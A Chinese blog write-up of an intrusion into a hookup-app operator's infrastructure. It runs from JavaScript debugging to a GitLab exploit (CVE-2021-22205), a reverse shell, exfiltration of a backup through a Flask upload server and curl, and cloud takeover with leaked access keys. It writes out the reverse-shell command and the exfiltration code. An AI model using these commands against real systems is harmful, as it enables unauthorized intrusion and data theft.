记一次HC中因为JS拿下整个云

                     免责声明

本文发布的工具和脚本,仅用作测试和学习研究,禁止用于商业用途,不能保证其合法性,准确性,完整性和有效性,请根据情况自行判断。如果任何单位或个人认为该项目的脚本可能涉嫌侵犯其权利,则应及时通知并提供身份证明,所有权证明,我们将在收到认证文件后删除相关内容。

文中所涉及的技术、思路及工具等相关知识仅供安全为目的的学习使用,任何人不得将其应用于非法用途及盈利等目的,间接使用文章中的任何工具、思路及技术,我方对于由此引起的法律后果概不负责。

——鼹鼠(一只正)

0x00 前言


 本次分享主要是分享一次HC中的思路,值得大家学习,服务器已经交给相关部门进行取证等也已经打包结A了

0x01 信息收集


首先给到一个资产是二维码,是一张sese图片里面带有约炮的app下载,扫码后得到如下结果

f23dd9f133bc40b89756924b817512a6.png

 得到如下结果:https://www.target.com 后进行访问主站

注册成功后发现全是妹子(........),这个时候先别急,咱第一步先去看他调用的JS资源,随便点击一个资源然后刷新一下看他F12网络

这里首先我只能用当时留下的毫无关联的图片进行演示了,当时我看到的JS文件叫 "MyProfile"

80d0eef9c3af49a8823d37944d9bbddb.png

 0x02 JS断点调试


这个凭借个人感觉就是个关键信息(我的资料 - > 配置信息?),

875e056de3074a3d979b82259a99f31f.png

 然后刷新进行调试,在漫长的调试过程中我发现在一个很奇怪的JS文件中调用了我的MyProfile字段,叫 /assets/index-xxxxxx.js

bindgen: "git+http://123.123.123.123:1111/target2/a.git#0.0.14"

 b7f2b6cfe69a4c32a16e9cf334aba583.png

 0x03 新突破


我当时就立刻去访问了一下,发现竟然是一个gitlab!

f58c00eced6f4455a932c8fc7c0825e9.png

 找了一下历史漏洞,CVE-2021-22205 直接梭哈,成功拿到shell

12fa84c5fe8e46a7b69c847324d7ee97.png

 由于是执行命令,所以写了shell反弹

echo 'bash -i >& /dev/tcp/123.123.123.123/1111 0>&1' > /tmp/haha.sh

chmod +x /tmp/haha.sh

/bin/bash /tmp/haha.sh

成功反弹shell

ecf19b891b0e4fe38302bdbf8cd248ce.png

 发现是ubunto的16.04,但是本地提权失败,找了SUID也没有办法,想尽了各种办法都没办法提权,打算放弃了。

所以接下来就是去寻找Git权限能做的操作,找了一个下午,最终找到了backups目录里下找到了一个backup的tar包,应该八成就是gitlab上的备份了。

12e8b89518044717a4351b198fcb4625.png

 Flask之取文件

但是问题来了,我怎么做到在我反弹shell中把文件拖出来了呢?scp等都试过了不行,于是乎我就写了个flask的上传页面让shell去curl一下把文件post上来(感觉这思路骚的)

我的服务器

from flask import Flask,request

import os

app = Flask(__name__)

@app.route('/upload',methods=['POST'])

def upload_file():

    file = request.files.get('file')

    if file :

        filename = file.filenamefile.save(os.path.join(os.getcwd(),filename))

        return f"File {filename} saved successfully"

    else   return "worry"

if __name__ == '__main__':

 app.run(host='0.0.0.0',debug=True,port=5000)

受控主机shell

curl -X POST http://123.123.123.123:1111/upload -F file=@./a.gitlab_backup.tar

0x04 云沦陷(泄露AK SK)


几个G,下载漫长的很呢!然后拖到本地后应该就是gitlab的备份了,(因为他备份文件名字中带有gitlab的版本号)要用到对应的gitlab的相应版本去搭建。

 

然后本地搭建导入备份后慢慢的寻找一些有用信息,后面突然发现一个叫application.yaml的文件,进行审计后泄露了ak和sk(这开发倒是备份挺明白的,全部都写清清楚楚)。

9b7787754d6d4c97be77bcfe97e839dc.png

 这个时候行云管家一把梭哈,因为权限很大,接管整个云了,总共是51台主机都拿下了。

0x05 总结


思路就是 :打点 -> JS文件断点调试 ->新突破上shell-> 解决困难-> 发现新大陆(本地搭建)-> 接管云,最后全部打包好给了JF,也进行取证立A了,到此因为一个JS文件拿下整个云结束了,思路可以学习一波。

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

安全仔的日记

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值